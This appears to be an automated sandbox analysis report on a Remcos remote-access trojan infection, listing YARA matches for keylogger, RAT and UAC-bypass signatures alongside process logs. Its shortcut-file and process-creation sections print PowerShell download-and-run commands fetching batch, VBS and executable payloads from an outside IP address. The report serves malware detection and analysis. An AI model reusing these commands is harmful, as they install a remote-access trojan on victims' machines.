Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://d.symcb.com/cps0%
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://d.symcb.com/rpa0
Source: svchost.exe, 00000015.00000003.2438441779.000002061F05E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000015.00000003.2438441779.000002061F000000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: DZIPR.exe.17.dr String found in binary or memory: https://www.datanumen.com/%https://www.datanumen.com/zip-repair/
Source: DZIPR.exe.17.dr String found in binary or memory: https://www.datanumen.com/contact/0https://www.datanumen.com/update/dzipr/dzipr.inf
Source: DZIPR.exe.17.dr String found in binary or memory: https://www.datanumen.com/support/
Source: DZIPR.exe.17.dr String found in binary or memory: https://www.datanumen.com/zip-repair-order/2https://www.datanumen.com/socialmedia/facebook.htm
Source: AUGUST.exe, 00000010.00000003.2318798588.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 00000010.00000003.2320949516.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.dr String found in binary or memory: https://www.datanumen.com/zip-repair/
Source: DZIPR.exe, 00000011.00000002.2343454264.000000000348B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.digicert.c
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Potential key logger detected (key state polling based)
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA504EE GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageW, 17_2_6FA504EE
Yara detected Keylogger Generic
Source: Yara match File source: 24.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.cmd.exe.59500c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.cmd.exe.59500c8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001A.00000002.2647625743.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2928479107.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.2757772777.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: cmd.exe PID: 6600, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 2720, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 1460, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 3004, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 5388, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 4924, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\qapuwvr, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\gps, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\demhwk, type: DROPPED

E-Banking Fraud
barindex
Yara detected Remcos RAT
Source: Yara match File source: 24.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.cmd.exe.59500c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.cmd.exe.59500c8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001A.00000002.2647625743.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2928479107.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.2757772777.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: cmd.exe PID: 6600, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 2720, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 1460, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 3004, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 5388, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 4924, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\qapuwvr, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\gps, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\demhwk, type: DROPPED

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 24.2.cmd.exe.5862757.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.cmd.exe.5861b57.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 26.2.explorer.exe.4e80757.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 17.2.DZIPR.exe.362a9ce.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 26.2.explorer.exe.4e7fb57.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.cmd.exe.581ca8a.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 17.2.DZIPR.exe.362b5ce.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 30.2.explorer.exe.4ee7a8a.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 24.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 19.2.cmd.exe.59500c8.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 19.2.cmd.exe.59500c8.7.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 19.2.cmd.exe.59500c8.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 24.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 19.2.cmd.exe.4f4a757.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 28.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 28.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 19.2.cmd.exe.4f04a8a.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 19.2.cmd.exe.59500c8.7.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 19.2.cmd.exe.59500c8.7.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 19.2.cmd.exe.59500c8.7.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 19.2.cmd.exe.4f49b57.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 30.2.explorer.exe.4f2cb57.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 28.2.cmd.exe.49d1a8a.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 30.2.explorer.exe.4f2d757.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 31.2.explorer.exe.4daca8a.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 28.2.cmd.exe.4a17757.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 28.2.cmd.exe.4a16b57.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 28.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 28.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 26.2.explorer.exe.4e3aa8a.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 31.2.explorer.exe.4df2757.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 31.2.explorer.exe.4df1b57.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 17.2.DZIPR.exe.35e5901.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000001A.00000002.2647625743.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000001F.00000002.2928479107.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000001E.00000002.2757772777.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: cmd.exe PID: 6600, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: cmd.exe PID: 2720, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: explorer.exe PID: 1460, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: cmd.exe PID: 3004, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: explorer.exe PID: 5388, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: explorer.exe PID: 4924, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\qapuwvr, type: DROPPED Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\qapuwvr, type: DROPPED Matched rule: REMCOS_RAT_variants Author: unknown
Source: C:\Users\user\AppData\Local\Temp\qapuwvr, type: DROPPED Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\gps, type: DROPPED Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\gps, type: DROPPED Matched rule: REMCOS_RAT_variants Author: unknown
Source: C:\Users\user\AppData\Local\Temp\gps, type: DROPPED Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\demhwk, type: DROPPED Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\demhwk, type: DROPPED Matched rule: REMCOS_RAT_variants Author: unknown
Source: C:\Users\user\AppData\Local\Temp\demhwk, type: DROPPED Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\AUGUST.exe Jump to dropped file
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Windows shortcut file (LNK) contains suspicious command line arguments
Source: Dlr7HYI6VL.lnk LNK file: /c powershell wget http://172.94.3.25/hello.bat -OutFile %APPDATA%/hello.bat && %APPDATA%/hello.bat
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/hi.vbs -OutFile C:\Users\user\AppData\Roaming/hi.vbs
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ffo.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/AUGUST.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/hi.vbs -OutFile C:\Users\user\AppData\Roaming/hi.vbs Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ffo.bat" " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/AUGUST.exe Jump to behavior
Contains functionality to call native functions
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FAD0D95 NtdllDefWindowProc_W, 23_2_6FAD0D95
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FACE5F6 NtdllDefWindowProc_W,CallWindowProcW, 23_2_6FACE5F6
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FAD2932 _memset,NtdllDefWindowProc_W, 23_2_6FAD2932
Creates files inside the system directory
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Windows\Tasks\lnfast_x64.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Code function: 16_2_00404FAA 16_2_00404FAA
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Code function: 16_2_0041206B 16_2_0041206B
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Code function: 16_2_0041022D 16_2_0041022D
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Code function: 16_2_00411F91 16_2_00411F91
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA45E70 17_2_6FA45E70
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA463F0 17_2_6FA463F0
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA55FB7 17_2_6FA55FB7
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA63E3B 17_2_6FA63E3B
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA5AE45 17_2_6FA5AE45
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA51D85 17_2_6FA51D85
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA45CA0 17_2_6FA45CA0
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA62CBB 17_2_6FA62CBB
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA56C6C 17_2_6FA56C6C
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA56860 17_2_6FA56860
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA6586C 17_2_6FA6586C
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA417D0 17_2_6FA417D0
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA41730 17_2_6FA41730
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA41739 17_2_6FA41739
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA63743 17_2_6FA63743
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA5648C 17_2_6FA5648C
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA631FF 17_2_6FA631FF
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA5708C 17_2_6FA5708C
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 18_2_6C515E70 18_2_6C515E70
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 18_2_6C5163F0 18_2_6C5163F0
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 18_2_6C532CBB 18_2_6C532CBB
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 18_2_6C515CA0 18_2_6C515CA0
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 18_2_6C521D85 18_2_6C521D85
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 18_2_6C52AE45 18_2_6C52AE45
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 18_2_6C533E3B 18_2_6C533E3B
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 18_2_6C533743 18_2_6C533743
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 18_2_6C511731 18_2_6C511731
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 18_2_6C511730 18_2_6C511730
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 18_2_6C5117D0 18_2_6C5117D0
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 18_2_6C525FB7 18_2_6C525FB7
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 18_2_6C53586C 18_2_6C53586C
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 18_2_6C5331FF 18_2_6C5331FF
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FAC5E70 23_2_6FAC5E70
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FAC63F0 23_2_6FAC63F0
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FAD5FB7 23_2_6FAD5FB7
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FAC17D0 23_2_6FAC17D0
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FAC1730 23_2_6FAC1730
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FAC1731 23_2_6FAC1731
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FAE3743 23_2_6FAE3743
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FAE3E3B 23_2_6FAE3E3B
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FADAE45 23_2_6FADAE45
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FAD1D85 23_2_6FAD1D85
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FAC5CA0 23_2_6FAC5CA0
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FAE2CBB 23_2_6FAE2CBB
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FAE31FF 23_2_6FAE31FF
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FAE586C 23_2_6FAE586C
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\demhwk 7AA4BC94F891709D5B0FF9C2F95060AEEFB5AC6EB75222F9F105E29C3965629F
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\gps 7AA4BC94F891709D5B0FF9C2F95060AEEFB5AC6EB75222F9F105E29C3965629F
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\qapuwvr 7AA4BC94F891709D5B0FF9C2F95060AEEFB5AC6EB75222F9F105E29C3965629F
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Code function: String function: 0040243B appears 37 times
Source: C:\Users\user\DZIPR.exe Code function: String function: 6FA553BC appears 48 times
Source: C:\Users\user\DZIPR.exe Code function: String function: 6FA550C9 appears 66 times
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: String function: 6C5253BC appears 44 times
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: String function: 6FAD50C9 appears 58 times
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: String function: 6FAD53BC appears 45 times
Yara signature match
Source: 24.2.cmd.exe.5862757.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.cmd.exe.5861b57.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 26.2.explorer.exe.4e80757.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 17.2.DZIPR.exe.362a9ce.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 26.2.explorer.exe.4e7fb57.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
